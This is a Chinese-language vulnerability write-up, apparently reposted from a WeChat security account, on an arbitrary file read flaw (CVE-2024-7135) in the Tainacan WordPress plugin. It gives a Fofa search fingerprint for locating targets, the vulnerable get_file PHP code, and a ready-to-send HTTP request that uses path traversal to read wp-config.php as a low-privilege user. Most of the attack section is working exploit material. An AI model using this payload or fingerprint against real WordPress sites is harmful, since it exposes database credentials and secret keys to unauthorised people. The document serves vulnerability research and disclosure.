0x00 前言
由于 0.21.7 之前(包括 0.21.7)的所有版本中缺少对“get_file”功能的功能检查,因此适用于 WordPress 的 Tainacan 插件容易受到未经授权的数据访问。该函数还容易受到目录遍历的攻击。这使得经过身份验证的攻击者(具有订阅者级别和更高级别访问权限)能够读取服务器上的任意文件的内容,这些文件可能包含敏感信息。
Fofa指纹:"wp-content/plugins/tainacan/"
首先下载安装WordPress 插件Tainacan 0.21.6 然后启用插件
Wordpress Test Version:5.6.1
0x01 漏洞分析
位于/wp-content/plugins/tainacan/classes/api/endpoints/class-tainacan-rest-background-processes-controller.php 控制器的getfile方法存在任意文件读取漏洞.
register_rest_route($this->namespace, '/' . $this->rest_base . '/(?P<id>[0-9]+)', array(
array(
'methods' => WP_REST_Server::EDITABLE,
'callback' => array($this, 'update_item'),
'permission_callback' => array($this, 'bg_processes_permissions_check'),
'args' => [
'status' => [
'type' => 'string',
'description' => __( '"open" or "closed" ', 'tainacan' ),
'enum' => array(
'open',
'closed'
)
]
],
),
));
...
public function get_file( $request ) {
if( !isset($request['guid']) ) {
return new WP_REST_Response([
'error_message' => __('guid must be specified', 'tainacan' )
], 400);
}
$guid = $request['guid'];
$upload_url = wp_upload_dir();
$path = $upload_url['basedir'] . '/tainacan/' . $guid;
if ( file_exists( $path ) ) {
$finfo = @finfo_open(FILEINFO_MIME_TYPE);
$mime_type = @finfo_file($finfo, $path);
$file_name = @basename($path);
http_response_code(200);
header('Content-Description: File Transfer');
header("Content-Disposition: attachment; filename=$file_name");
header("Content-Type: $mime_type");
header("Content-Length: " . @filesize( $path ));
readfile($path);
} else {
return new WP_REST_Response("file not found", 404, array('content-type' => 'text/html; charset=utf-8'));
}
}
且直接进入了Rest Api端点中,导致漏洞发生.
0x02 漏洞复现
首先要注册一个普通用户并登录,然后获取一下网站首页的Nonce,之后就可以直接读取了.
Payload:
GET /wp-json/tainacan/v2/bg-processes/file?guid=../../../wp-config.php&_wpnonce=替换目标网站nonce HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=57p45m6lctlfttfrsjfpk4fui9; wp_lang=zh_CN; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1729391061%7ColYyhIIyEr3yA8JstL99jsKU6rCXsMPR8tQH6nNauzP%7C59e8715eb35b44ed9532e025052b7ef1748b384a9e03a39a9538cd4cd18ffdbe; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26mfold%3Do; wp-settings-time-1=1729218262
Host: 127.0.0.1
Pragma: no-cache
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
原文始发于微信公众号(星悦安全):WordPress Tainacan 插件存在前台任意文件读取漏洞(CVE-2024-7135)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论